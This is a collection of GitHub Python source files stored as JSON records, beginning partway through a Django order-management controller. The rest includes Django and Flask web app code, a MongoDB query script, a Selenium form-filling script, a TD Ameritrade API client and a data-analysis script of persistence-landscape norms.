order_number = data_dict['stock_order_number']\n            order_number_part = order_number[9:]\n            order_date = datetime.datetime.now()\n            year = order_date.year\n            str_year = str(year)\n            year_part = str_year[len(str_year) - 1:len(str_year)]\n            month = order_date.month\n            str_month = str(month)\n            if len(str_month) == 1:\n                str_month = '0' + str_month\n            day = order_date.day\n            str_day = str(day)\n            if len(str_day) == 1:\n                str_day = '0' + str_day\n            if flag == 'list':\n                qty = data_dict['remaining_qty']\n            else:\n                qty = data_dict['lab_qty']\n\n            last_laborders = LabOrder.objects.filter(lab_number__contains=order_number_part).order_by(\"-id\")\n            if len(last_laborders) > 0:\n                str_count = last_laborders[0].lab_number.split(\"-\")[-1]\n                if \"T\" in str_count:\n                    count = 1\n                else:\n                    count = int(str_count) + 1\n            else:\n                count = 0\n\n            inv_struct_lens = inventory_struct_lens.objects.filter(sku=data_dict['od_lens_sku'])\n            sku = inv_struct_lens[0].base_sku\n            if '-' in sku[0:2]:\n                vendor = sku[:1]\n            else:\n                vendor = sku[:2]\n\n            lens_list = lens.objects.filter(sku=sku)\n            if len(lens_list) > 0:\n                lens_name = lens_list[0].name\n            else:\n                lens_name = inv_struct_lens[0].name.replace(\"-近视\", \"\").replace(\"-老花\", \"\")\n\n            pf_lists = product_frame.objects.filter(sku=data_dict['frame'])\n            if len(pf_lists) == 0:\n                image = ''\n                thumbnail = ''\n            else:\n                pf = pf_lists[0]\n                image = pf.image\n                thumbnail = pf.thumbnail\n\n            for i in range(1, int(qty)+1):\n                lab_order_number = year_part + str_month + str_day + '-' + order_number_part + '-' + str(i) + \"T\" + str(\n                    qty)\n                if count > 0:\n                    lab_order_number = lab_order_number + \"-\" + str(count)\n                lbo = LabOrder()\n                # General\n                lbo.lab_number = lab_order_number\n                lbo.order_number = order_number\n                lbo.base_entity = data_dict['id']\n                lbo.type = 'STKO'\n                lbo.chanel = ''\n                lbo.is_vip = False\n                lbo.tag = 'WEBSITE'\n                lbo.ship_direction = 'EMPLOYEE'\n                lbo.act_ship_direction = 'EMPLOYEE'\n\n                lbo.order_date = order_date\n                lbo.order_datetime = datetime.datetime.strptime(data_dict['start_date'], '%Y-%m-%d %H:%M:%S')\n                lbo.frame = data_dict['frame']\n                lbo.lens_sku = ''\n                lbo.quantity = 1\n                lbo.vendor = vendor\n\n                if int(vendor) < 10:\n                    lbo.lens_sku = inv_struct_lens[0].base_sku[2:]\n                else:\n                    lbo.lens_sku = inv_struct_lens[0].base_sku[3:]\n\n                lbo.lens_name = lens_name\n                lbo.act_lens_name = lens_name\n                lbo.act_lens_sku = inv_struct_lens[0].base_sku\n                lbo.od_sph = data_dict['od_lens_sph']\n                lbo.od_cyl = data_dict['od_lens_cyl']\n                lbo.os_sph = data_dict['os_lens_sph']\n                lbo.os_cyl = data_dict['os_lens_cyl']\n                lbo.comments = data_dict['comments']\n                lbo.comments_inner = ''\n\n                lbo.estimated_ship_date = order_date + datetime.timedelta(days=7)\n                lbo.estimated_time = order_date + datetime.timedelta(days=7)\n                lbo.estimated_date = order_date + datetime.timedelta(days=7)\n                lbo.targeted_date = order_date + datetime.timedelta(days=7)\n                lbo.image = image\n                lbo.thumbnail = thumbnail\n                lbo.save()\n                bar_img_src = utilities.createC128(str(\"%s%s\" % (settings.BAR_CODE_PREFIX, lbo.id)), lbo.create_at)\n                lbo.c128_path = bar_img_src\n                lbo.save()\n\n            data['code'] = 0\n            data['message'] = \"Success\"\n            return data\n        except Exception as e:\n            data['code'] = -1\n            data['message'] = str(e)\n            return data\n","repo_name":"qiaozhizt/OMS","sub_path":"stockorder/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":4969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"39368899017","text":"from django.http.response import JsonResponse\nfrom django.shortcuts import 
redirect, render\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\n\nfrom .forms import GoalForm, CustomUserCreationForm, LoginForm\nfrom .data import initial_data\nfrom .models import Goal\nfrom therapy.settings import BIBLE_API_KEY\nimport json\nimport requests\n\n\ndef index(request):\n    keys = initial_data.keys()\n    return render(request, \"index.html\", {\n        \"emotions\": keys\n    })\n\n\ndef feeling(request, title):\n    title = title.capitalize()\n\n    emotion_object = initial_data.get(title)\n    if emotion_object:\n        data = emotion_object['entries']\n        src = 'images/' + emotion_object['image']['src']\n        alt = emotion_object['image']['alt']\n        return render(request, \"emotion.html\", {\n            \"data\": data, \"title\": title, \"src\": src, \"alt\": alt\n        })\n\n    # If data not found, redirect home\n    return redirect('index')\n\n\ndef goals(request):\n    # Redirect if user not logged in\n    if not request.user.is_authenticated:\n        messages.info(request, 'Log in to Make a Goal')\n        return redirect('login')\n\n    # Delete goal\n    if request.method == 'DELETE':\n        # Parse json data from fetch request and convert into Python Dict\n        data = json.loads(request.body)\n\n        # Retrieve goal id\n        goal_id = data.get(\"goalId\")\n\n        # Retrieve goal, verify goal was created by user\n        try:\n            goal_obj = Goal.objects.get(id=goal_id, setter=request.user)\n            goal_obj.delete()\n        except Exception:\n            return JsonResponse({\"message\": \"problem\"})\n\n        #### delete works...but I want to update w/o page reload #########\n        return JsonResponse({\"message\": \"success\"})\n\n    goal_data = Goal.objects.filter(setter=request.user)\n    return render(request, \"goals.html\", {\n        \"goals\": goal_data\n    })\n\n\ndef set_goal(request, topic, id):\n    # Redirect if user not logged in\n    if not request.user.is_authenticated:\n        messages.info(request, 'Log in to Make a Goal')\n        return redirect('login')\n\n    topic = topic.capitalize()\n    # Try to retrieve requested goal entry from data.py\n    try:\n        for entry in initial_data[topic]['entries']:\n            if (\"id\", id) in entry.items():\n                # Prepopulate form\n                form = GoalForm(initial=entry)\n                return render(request, \"create.html\", {\n                    'form': form\n                })\n    except Exception:\n        pass\n\n    return redirect('create')\n\n\ndef bible(request):\n    # TODO: when changing translation, store data from book and chapter--don't reset\n    if request.method == 'POST':\n        # Retrieve form data\n        data = json.loads(request.body)\n        bible_id = data.get('bibleId')\n        book_id = data.get('bookId')\n        chapter_id = data.get('chapterId')\n\n        # Only Bible id found, send request to get bible books\n        if bible_id and not book_id and not chapter_id:\n            url = f'https://api.scripture.api.bible/v1/bibles/{bible_id}/books'\n            headers = {'api-key': BIBLE_API_KEY}\n            response = requests.get(url, headers=headers)\n            data = response.json()\n            bible_books = data[\"data\"]\n\n            return JsonResponse({\n                'data': bible_books\n            })\n\n        # Bible and book id found, send request to get book chapters\n        if bible_id and book_id:\n            url = f'https://api.scripture.api.bible/v1/bibles/{bible_id}/books/{book_id}/chapters'\n            headers = {'api-key': BIBLE_API_KEY}\n            response = requests.get(url, headers=headers)\n            data = response.json()\n            try:\n                book_chapters = data[\"data\"]\n            except KeyError:\n                return JsonResponse({\n                    'data': 'keyError'\n                })\n\n            return JsonResponse({\n                'data': 
book_chapters\n })\n\n # Bible and chapter id found, send request to get chapter verses\n if bible_id and chapter_id:\n url = f'https://api.scripture.api.bible/v1/bibles/{bible_id}/chapters/{chapter_id}'\n headers = {'api-key': BIBLE_API_KEY}\n response = requests.get(url, headers=headers)\n data = response.json()\n try:\n chapter_verses = data[\"data\"]\n except KeyError:\n return JsonResponse({\n 'data': 'keyError'\n })\n return JsonResponse({\n 'data': chapter_verses\n })\n\n # No data was found\n return JsonResponse({\n 'data': 'not found'\n })\n\n # Use requests for server-side api calls, https://docs.python-requests.org/en/latest/\n\n url = 'https://api.scripture.api.bible/v1/bibles?language=eng'\n headers = {'api-key': BIBLE_API_KEY}\n response = requests.get(url, headers=headers)\n bibles = response.json()\n\n # Remove repetition of translation names\n name_list = []\n bible_list = []\n for bible in bibles[\"data\"]:\n if not bible[\"name\"] in name_list:\n name_list.append(bible[\"name\"])\n bible_list.append(bible)\n\n # Sort bibles by abbreviation name\n bible_list = sorted(\n bible_list, key=lambda bible: bible[\"abbreviationLocal\"])\n\n return render(request, \"bible.html\", {\n \"bibles\": bible_list\n })\n\n\n@login_required(login_url='login')\ndef create_goal(request):\n\n if request.method == \"POST\":\n # Retrieve form data\n form = GoalForm(request.POST)\n\n # Check if valid form\n if form.is_valid():\n\n # No need to use cleaned_data for ModelForm\n goal_obj = form.save(commit=False)\n goal_obj.setter = request.user\n goal_obj.save()\n\n return redirect('goals')\n\n form = GoalForm()\n return render(request, \"create.html\", {\n 'form': form\n })\n\n\ndef register(request):\n\n if request.method == \"POST\":\n form = CustomUserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n\n next_url = request.POST.get('next')\n username = request.POST['username']\n password = request.POST['password1']\n user = authenticate(username=username, password=password)\n\n login(request, user)\n messages.success(request, 'Account created successfully!')\n if next_url:\n return redirect(next_url)\n return redirect('index')\n\n else:\n form = CustomUserCreationForm()\n\n return render(request, \"register.html\", {\n 'form': form\n })\n\n\ndef login_view(request):\n if request.method == \"POST\":\n form = LoginForm(data=request.POST)\n if form.is_valid():\n\n # Get form data\n next_url = request.POST.get('next')\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n\n # Check if valid credentials, if not, a user object is not retrieved\n user = authenticate(request, username=username, password=password)\n\n # Check to see if user exists\n if user is not None:\n login(request, user)\n\n # Check if there was a next parameter to redirect back to\n if next_url:\n return redirect(next_url)\n return redirect(\"index\")\n\n else:\n form = LoginForm()\n return render(request, \"login.html\", {\n 'form': form\n })\n\n\ndef logout_view(request):\n logout(request)\n return redirect(\"index\")\n","repo_name":"markinjamaica/therapy","sub_path":"biblehelp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36798469611","text":"from db import db\nfrom flask import session\n\ndef create_chain(chain_name, chain_message, creater_id, topic_id):\n db.session.execute(\n \"INSERT INTO chains (chain_name, chain_message, creater_id, visible, 
created_at, topic_id) VALUES (:chain_name, :chain_message, :creater_id, :visible, NOW(), :topic_id )\", {\"chain_name\":chain_name, \"chain_message\":chain_message, \"creater_id\":creater_id, \"visible\": True, \"topic_id\":topic_id }) \n    db.session.commit()\n\ndef delete_chain(chain_id, user_id):\n    if entitled_to_chain(chain_id, user_id):\n        db.session.execute(\"UPDATE chains SET visible=False WHERE id=:id\", {\"id\": chain_id})\n        db.session.commit()\n\ndef get_chains(topic_id):\n    chains = db.session.execute(\"SELECT chain_name FROM chains WHERE visible=TRUE AND topic_id=:topic_id\", {\"topic_id\": topic_id})\n    return chains.fetchall()\n\ndef get_related_messages(chain_id):\n    messages = db.session.execute(\n        \"SELECT messages.content, messages.sender_id, messages.id, users.username FROM messages LEFT JOIN users ON messages.sender_id = users.id WHERE visible=True AND messages.chain_id=:chain_id\", {\"chain_id\": chain_id})\n    return messages.fetchall()\n\ndef get_chain(chain_id):\n    name = db.session.execute(\n        \"SELECT chain_name, chain_message FROM chains WHERE id=:chain_id\", {\"chain_id\": chain_id})\n    return name.fetchone()\n\ndef get_topic_name(chain_id):\n    name = db.session.execute(\n        \"SELECT topics.topic_name FROM chains LEFT JOIN topics ON chains.topic_id = topics.id WHERE chains.id =:chain_id\", {\"chain_id\": chain_id})\n    return name.fetchone()[0]\n\ndef get_creater(chain_id):\n    creater = db.session.execute(\n        \"SELECT users.username FROM chains LEFT JOIN users ON chains.creater_id = users.id WHERE chains.id=:chain_id\", {\"chain_id\": chain_id}\n    )\n    return creater.fetchone()[0]\n\ndef entitled_to_chain(chain_id, user_id):\n    result = db.session.execute(\n        \"SELECT creater_id from chains where id=:chain_id\", {\n            \"chain_id\": chain_id}\n    )\n    creater_id = result.fetchone()[0]\n    result = db.session.execute(\n        \"SELECT type from users where id=:user_id\", {\"user_id\": user_id}\n    )\n    user_type = result.fetchone()[0]\n    return user_id == creater_id or user_type == \"admin\"\n\ndef get_related_topic(chain_id):\n    result = db.session.execute(\n        \"SELECT topic_id from chains WHERE id=:chain_id\", {\n            \"chain_id\": chain_id}\n    )\n    topic_id = result.fetchone()[0]\n    return topic_id\n","repo_name":"eevahanka/tsoha","sub_path":"chains.py","file_name":"chains.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"72932456164","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pyximport\npyximport.install()\n\nfrom _eulerfw import EulerForward\n\ndef sine(t, y, fout, Ak=None):\n    # x = A*sin(k*t)\n    # x' = A*k*cos(k*t)\n    # x'' = -A*k**2*sin(k*t)\n    A, k = Ak\n    fout[0] = y[1]\n    fout[1] = -k**2 * y[0]\n\ndef test_sine():\n    A, k = [2, 3]\n    ef = EulerForward(2, sine, dict(Ak=[A, k]))\n    assert ef.get_ny() == 2\n    tout = np.linspace(0, 4, 8192)\n    y0 = np.array([0., A*k])\n    assert ef.get_dx0(0, y0) == 0.0\n    assert ef.get_dx_max(0, y0) == float('inf')\n    yout, time_wall = ef.integrate(tout, y0)\n    yref0 = A*np.sin(k*tout)\n    yref1 = A*np.cos(k*tout)*k\n    assert np.allclose(np.vstack([yref0, yref1]).T, yout, atol=0.05)\n    assert 1e-9 < time_wall < 2.0 # takes about 20 ms on modern 2012 desktop computer\n\nif __name__ == '__main__':\n    
test_sine()\n","repo_name":"bjodah/anyode","sub_path":"tests/eulerfw/test_eulerfw.py","file_name":"test_eulerfw.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"3233695933","text":"import pymongo\r\n\r\nmyClient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\r\nmydb = myClient[\"FootballDBMongo\"]\r\n\r\n\r\nprint(\"This query will give the top 5 attackers based on your team budget and player base price \")\r\nuserInputTeam = input(\"Enter the team name : \")\r\n\r\nqueryString_partOne = {\"name\": userInputTeam}\r\nqueryString_partTwo = {\"Budget\": 1, \"_id\": 0}\r\n\r\nx = mydb.clubStats.find(queryString_partOne, queryString_partTwo)\r\n\r\nhas_val = mydb.clubStats.count_documents({\"name\": userInputTeam}) > 0\r\n\r\nif has_val:\r\n\r\n    for firstValue in x:\r\n\r\n        for a in firstValue:\r\n\r\n            queryString_partThree = {\r\n                \"$and\": [{\"Position\": \"Attacker\"}, {\"BasePrice\": {\"$lt\": firstValue[a]}}, {\"Team\": {\"$ne\": userInputTeam}}]}\r\n\r\n            queryString_partFour = {\"Name\": 1, \"_id\": 0, \"BasePrice\": 1, \"Team\": 1}\r\n\r\n            y = mydb.playerStats.find(queryString_partThree, queryString_partFour)\r\n            sortedList = y.sort(\"BasePrice\", pymongo.DESCENDING)\r\n            listOfDocuments = sortedList.limit(5)\r\n            print(\"---LIST OF SUITABLE ATTACKERS IN YOUR PRICE RANGE---\")\r\n            for eachDocument in listOfDocuments:\r\n                print(eachDocument)\r\n\r\nelse:\r\n    print(\"No records found\")\r\n","repo_name":"chinmay81192/Information-Systems","sub_path":"Story1c.py","file_name":"Story1c.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"21068974282","text":"from flask import Blueprint, render_template, request\n\n# Here go the routes\n\nviews = Blueprint(\"views\", __name__)\n\n@views.route(\"/\")\ndef home():\n    if request.method == \"POST\":\n        return None\n    else:\n        return render_template(\"index.html\")","repo_name":"daniel-locatelli/ccc","sub_path":"website-oldMoreStructured/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"9605388727","text":"#REMEMBER TO CHANGE YOUR FILEPATH AND ADD A FOLDER... \n#IN THIS CASE THE FOLDER IS CALLED \"db\"\n\nfrom datetime import datetime\nnow = datetime.now()\ncurrent_time = now.strftime(\"%c\")\n\nname = str(input(\"What's your name? \"))\nsurname = str(input(\"What's your surname? \"))\nage = int(input(\"What's your age? \"))\nweight = float(input(\"What's your weight? 
\"))\nweightu = str(input(\"Kg's(K) or Lb's?(L) \"))\n\nif weightu == \"L\":\n weight = weight * 0.45\nelif weightu == \"K\":\n weight = weight / 0.45\n\nresult = (\"Your name: \" + name, \"Your Surname: \" + surname, \"Your Age: \" + str(age), \"Your weight \" + str(weight))\nresult = str(result)\nprint (result)\n\n\nwith open('db/db.txt', 'at') as f:\n f.write('\\nDB started | ')\n f.write(str(current_time))\n f.write (\"\\n\" + \"\\n\")\nf = open(\"db/db.txt\", \"at\") #CHANGE THIS\nf.write(result)\nf.close\nf = open(\"db/db.txt\") #CHANGE THIS\nprint(str(f))\n","repo_name":"Goatl33t/weight-checker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"192077964","text":"from functools import cached_property\n\nfrom fastapi import APIRouter, Depends, HTTPException, status\nfrom pydantic import UUID4\n\nfrom mealie.schema.group.group import GroupAdminUpdate\nfrom mealie.schema.mapper import mapper\nfrom mealie.schema.response.pagination import PaginationQuery\nfrom mealie.schema.response.responses import ErrorResponse\nfrom mealie.schema.user.user import GroupBase, GroupInDB, GroupPagination\nfrom mealie.services.group_services.group_service import GroupService\n\nfrom .._base import BaseAdminController, controller\nfrom .._base.mixins import HttpRepo\n\nrouter = APIRouter(prefix=\"/groups\", tags=[\"Admin: Groups\"])\n\n\n@controller(router)\nclass AdminUserManagementRoutes(BaseAdminController):\n @cached_property\n def repo(self):\n if not self.user:\n raise Exception(\"No user is logged in.\")\n\n return self.repos.groups\n\n # =======================================================================\n # CRUD Operations\n\n @property\n def mixins(self):\n return HttpRepo[GroupBase, GroupInDB, GroupAdminUpdate](\n self.repo,\n self.logger,\n self.registered_exceptions,\n )\n\n @router.get(\"\", response_model=GroupPagination)\n def get_all(self, q: PaginationQuery = Depends(PaginationQuery)):\n response = self.repo.page_all(\n pagination=q,\n override=GroupInDB,\n )\n\n response.set_pagination_guides(router.url_path_for(\"get_all\"), q.dict())\n return response\n\n @router.post(\"\", response_model=GroupInDB, status_code=status.HTTP_201_CREATED)\n def create_one(self, data: GroupBase):\n return GroupService.create_group(self.repos, data)\n\n @router.get(\"/{item_id}\", response_model=GroupInDB)\n def get_one(self, item_id: UUID4):\n return self.mixins.get_one(item_id)\n\n @router.put(\"/{item_id}\", response_model=GroupInDB)\n def update_one(self, item_id: UUID4, data: GroupAdminUpdate):\n group = self.repo.get_one(item_id)\n\n if data.preferences:\n preferences = self.repos.group_preferences.get_one(value=item_id, key=\"group_id\")\n preferences = mapper(data.preferences, preferences)\n group.preferences = self.repos.group_preferences.update(item_id, preferences)\n\n if data.name not in [\"\", group.name]:\n group.name = data.name\n group = self.repo.update(item_id, group)\n\n return group\n\n @router.delete(\"/{item_id}\", response_model=GroupInDB)\n def delete_one(self, item_id: UUID4):\n item = self.repo.get_one(item_id)\n\n if item and len(item.users) > 0:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=ErrorResponse.respond(message=\"Cannot delete group with users\"),\n )\n\n return 
self.mixins.delete_one(item_id)\n","repo_name":"mealie-recipes/mealie","sub_path":"mealie/routes/admin/admin_management_groups.py","file_name":"admin_management_groups.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","stars":3977,"dataset":"github-code","pt":"52"}
{"seq_id":"4814687120","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\n\n\noptions = webdriver.ChromeOptions()\noptions.add_experimental_option(\"detach\", True)\n\n#edgeBrowser = webdriver.Edge(r\"D:\\Edge-driver\\msedgedriver.exe\")\n\ndriver = webdriver.Chrome(options=options, executable_path=r'')\n\n#driver.maximize_window()\n\n\nurl1=\"\"\n\ndriver.get(url1)\n\n\n# Log into the web page using Selenium\n\nuser_block = driver.find_element(By.NAME, \"username\")\npw_block = driver.find_element(By.NAME, \"password\")\n\nuser_block.send_keys(\"Admin\")\npw_block.send_keys(\"Admin123\")\n\nhtml_list = driver.find_element(By.ID, \"sessionLocation\")\nitems = html_list.find_elements(By.TAG_NAME, \"li\")\nfor item in items:\n    text = item.text\n    if(text==\"Laboratory\"):\n        clickingUl = driver.find_element(By.ID, text)\n        clickingUl.click()\n        print(text)\n\nsubmit_button = driver.find_element(By.XPATH, \"//input[@type='submit']\")\n\nsubmit_button.click()\n\n\n\nddelement = Select(driver.find_element(By.ID, 'id_contact'))\nddelement.select_by_index(1)\n\n\nemail = driver.find_element(By.ID, \"email\")\nemail.send_keys(\"test@gmail.com\")\norderReference = driver.find_element(By.ID, \"id_order\")\norderReference.send_keys(\"Admin\")\nMessage = driver.find_element(By.NAME, \"message\")\nMessage.send_keys(\"ok\")\n\n\nsubmit_button = driver.find_element(By.ID, \"submitMessage\")\nsubmit_button.click()\n\ndriver.get_screenshot_as_file(\"capture.png\")","repo_name":"VigneshEswaramurthi/Web-Automation-using-Selenium","sub_path":"webAutomation.py","file_name":"webAutomation.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"29329786824","text":"import time\r\nimport logging\r\nimport requests\r\nfrom lib.broker_api.broker_api import BrokerAPI\r\n\r\nclass TDAClient(BrokerAPI):\r\n    def __init__(self, params):\r\n        if \"api_key\" not in params:\r\n            raise KeyError(\"api_key must be provided for TDAClient\")\r\n        self.api_key = params[\"api_key\"]\r\n\r\n    def get_price_history(self, symbol, start_date, end_date, minute_frequency):\r\n        s = time.perf_counter()\r\n        query_url = f\"https://api.tdameritrade.com/v1/marketdata/{symbol}/pricehistory?apikey={self.api_key}&periodType=day&frequencyType=minute&frequency={minute_frequency}&endDate={end_date}000&startDate={start_date}000\"\r\n        logging.info(query_url)\r\n        r = requests.get(query_url)\r\n        #print(r.text)\r\n        candles = []\r\n        for stock_record in r.json()['candles']:\r\n            # sample stock_record\r\n            # {'open': 223.44, 'high': 223.5, 'low': 223.4, 'close': 223.5, 'volume': 4867, 'datetime': 1570661040000}\r\n            stock_record['stock'] = symbol.lower()\r\n            stock_record['stimestamp'] = stock_record.pop('datetime')\r\n\r\n            stock_record['volume'] = int(stock_record['volume'])\r\n            stock_record['stimestamp'] = int(stock_record['stimestamp'])\r\n\r\n            #print(stock_record)\r\n            candles.append(stock_record)\r\n\r\n        elapsed = time.perf_counter() - s\r\n        logging.info(f\"Got {len(candles)} price history data points for {symbol} at {minute_frequency} minute interval {__file__} in 
{elapsed:0.2f} seconds.\")\r\n        return candles\r\n\r\n    def get_market_hours(self, date):\r\n        query_url = f\"https://api.tdameritrade.com/v1/marketdata/hours?apikey={self.api_key}&markets=EQUITY,OPTION,BOND&date={date}\"\r\n        logging.info(query_url)\r\n\r\n        r = requests.get(query_url)\r\n        return r.json()\r\n","repo_name":"tomtupy/market-data-worker","sub_path":"lib/broker_api/td_ameritrade/tda_client.py","file_name":"tda_client.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"36027921794","text":"import os\n\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport random\n\n# input the mean of a df and format into a list ready to plot\ndef format_list(df):\n    values = []\n    x_values = []\n    for i in range(len(df) - 2):\n        x_values.append(i)\n        values.append(df.iloc[i+1])\n    return x_values, values\n\n\n# input the mean of a df and format into a list ready to plot\ndef format_list_sums(df):\n    values = []\n    x_values = []\n    for i in range(len(df) - 1):\n        x_values.append(i)\n        values.append(df.iloc[i+1])\n    return x_values, values\n\n\n# input the mean of a df and format into a list ready to plot\ndef format_list_norms(df):\n    values = []\n    for i in range(len(df) - 1):\n        values.append(df.iloc[i+1])\n    return values\n\n\n\n\"\"\"\n\ntrain test split analysis\n\n\"\"\"\n\n\ndef predict_tick(pnorm):\n    if pnorm <= divider1:\n        return 0\n    if pnorm <= divider2:\n        return 48\n    if pnorm <= divider3:\n        return 96\n    return 144\n\nperc_0 = []\nperc_48 = []\nperc_96 = []\nperc_144 = []\nperc_all = []\n\n\nfor k in range(100):\n    # hold out 3 random simulations for testing on each run\n    # (the /300 and /1200 normalizations below assume a test size of 3)\n    train = [i for i in range(25)]\n    test = random.sample(train, 3)\n    for j in test:\n        train.remove(j)\n\n\n    # all_norms = pd.read_csv(\"17_7_60_3_all.csv\")\n    # leftright = pd.read_csv(\"17_7_60_3_all_bu.csv\")\n    # another = pd.read_csv(\"17_7_60_3_all_rl\")\n    # anotheranother = pd.read_csv(\"17_7_60_3_all_td.csv\")\n    #\n    all_norms = pd.read_csv(\"25sim_lr.csv\")\n    leftright = pd.read_csv(\"25sim_rl.csv\")\n    another = pd.read_csv(\"25sim_td.csv\")\n    anotheranother = pd.read_csv(\"25sim_bu.csv\")\n    all_norms[\"0\"] = (all_norms[\"0\"] + another[\"0\"]+leftright[\"0\"]+anotheranother[\"0\"])/4\n\n\n    tick_0 = all_norms.loc[all_norms[\"tick number\"] == 0]\n    train_tick_0 = [tick_0.iloc[i].loc[\"0\"] for i in train]\n    test_tick_0 = [tick_0.iloc[i].loc[\"0\"] for i in test]\n\n    tick_48 = all_norms.loc[all_norms[\"tick number\"] == 48]\n    train_tick_48 = [tick_48.iloc[i].loc[\"0\"] for i in train]\n    test_tick_48 = [tick_48.iloc[i].loc[\"0\"] for i in test]\n\n    tick_96 = all_norms.loc[all_norms[\"tick number\"] == 96]\n    train_tick_96 = [tick_96.iloc[i].loc[\"0\"] for i in train]\n    test_tick_96 = [tick_96.iloc[i].loc[\"0\"] for i in test]\n\n    tick_144 = all_norms.loc[all_norms[\"tick number\"] == 144]\n    train_tick_144 = [tick_144.iloc[i].loc[\"0\"] for i in train]\n    test_tick_144 = [tick_144.iloc[i].loc[\"0\"] for i in test]\n\n\n\n    divider1 = (min(train_tick_48) + max(train_tick_0))/2\n    # if (min(train_tick_48) - max(train_tick_0)) < 0:\n    #     print(f'overlap between 0 and 48 of {min(train_tick_48) - max(train_tick_0)}')\n\n    divider2 = (min(train_tick_96) + max(train_tick_48))/2\n    # if (min(train_tick_96) - max(train_tick_48)) < 0:\n    #     print(f'overlap between 96 and 48 of {min(train_tick_96) - max(train_tick_48)}')\n\n    divider3 = (min(train_tick_144) + max(train_tick_96))/2\n    # if (min(train_tick_144) - max(train_tick_96)) < 0:\n    # 
print(f'overlap between 96 and 144 of {min(train_tick_144) - max(train_tick_96)}')\n\n\n    correct_0 = 0\n    for tick in test_tick_0:\n        if predict_tick(tick) == 0:\n            correct_0 = correct_0 + 1\n    perc_0.append(correct_0)\n\n    correct_48 = 0\n    for tick in test_tick_48:\n        if predict_tick(tick) == 48:\n            correct_48 = correct_48 + 1\n    perc_48.append(correct_48)\n\n    correct_96 = 0\n    for tick in test_tick_96:\n        if predict_tick(tick) == 96:\n            correct_96 = correct_96 + 1\n    perc_96.append(correct_96)\n\n    correct_144 = 0\n    for tick in test_tick_144:\n        if predict_tick(tick) == 144:\n            correct_144 = correct_144 + 1\n    perc_144.append(correct_144)\n\n\n    perc_all.append(correct_0+correct_48+correct_96+correct_144)\n\nprint(sum(perc_0)/300)\nprint(sum(perc_48)/300)\nprint(sum(perc_96)/300)\nprint(sum(perc_144)/300)\nprint(sum(perc_all)/1200)\n\n\n\n# exit()\n\n\n\"\"\"\n\ngraphs the p norms from simulations 1-100, and the histogram for each time tick\n\n\"\"\"\n\ntick_0 = all_norms.loc[all_norms[\"tick number\"] == 0]\ntick_48 = all_norms.loc[all_norms[\"tick number\"] == 48]\ntick_96 = all_norms.loc[all_norms[\"tick number\"] == 96]\ntick_144 = all_norms.loc[all_norms[\"tick number\"] == 144]\n\nsize = 3\nplt.scatter(tick_0[\"0\"], tick_0[\"tick number\"], s=size)\nplt.scatter(tick_48[\"0\"], tick_48[\"tick number\"], s=size)\nplt.scatter(tick_96[\"0\"], tick_96[\"tick number\"], s=size)\nplt.scatter(tick_144[\"0\"], tick_144[\"tick number\"], s=size)\n\n# plots the midlines\nplt.plot([divider1, divider1], [-10, 200], \"black\")\nplt.plot([divider2, divider2], [-10, 200], \"black\")\nplt.plot([divider3, divider3], [-10, 200], \"black\")\n\nplt.ylim(0, 150)\nplt.ylabel(\"Time Tick\")\nplt.xlabel(\"Persistence Landscape Norms\")\nplt.show()\n\n# # exit()\n#\n# plt.hist(tick_0[\"0\"])\n# plt.show()\n#\n# plt.hist(tick_48[\"0\"])\n# plt.show()\n#\n# plt.hist(tick_96[\"0\"])\n# plt.show()\n#\n# plt.hist(tick_144[\"0\"])\n# plt.show()\n#\n# print(tick_0.mean(), tick_0.std())\n# print(tick_48.mean(), tick_48.std())\n# print(tick_96.mean(), tick_96.std())\n# print(tick_144.mean(), tick_144.std())\n#\n#\n# # prints the index of the outlier simulations\n# for i in range(len(tick_144)):\n#     if tick_144.iloc[i][\"0\"] > 375:\n#         print(i)\n\n\n\n\"\"\"\n\ngraphs the p norm for each simulation\n\n\"\"\"\n\ntrain_tick_0 = [tick_0.iloc[i].loc[\"0\"] for i in range(25)]\ntrain_tick_48 = [tick_48.iloc[i].loc[\"0\"] for i in range(25)]\ntrain_tick_96 = [tick_96.iloc[i].loc[\"0\"] for i in range(25)]\ntrain_tick_144 = [tick_144.iloc[i].loc[\"0\"] for i in range(25)]\n\nfor i in range(25):\n    plt.plot([0, 48, 96, 144], [train_tick_0[i], train_tick_48[i], train_tick_96[i], train_tick_144[i]])\nplt.xlabel(\"Time Tick\")\nplt.ylabel(\"Norm of Persistence Landscape\")\nplt.show()\n\nplt.plot([0, 48, 96, 144],[sum(train_tick_0)/25, sum(train_tick_48)/25, sum(train_tick_96)/25, 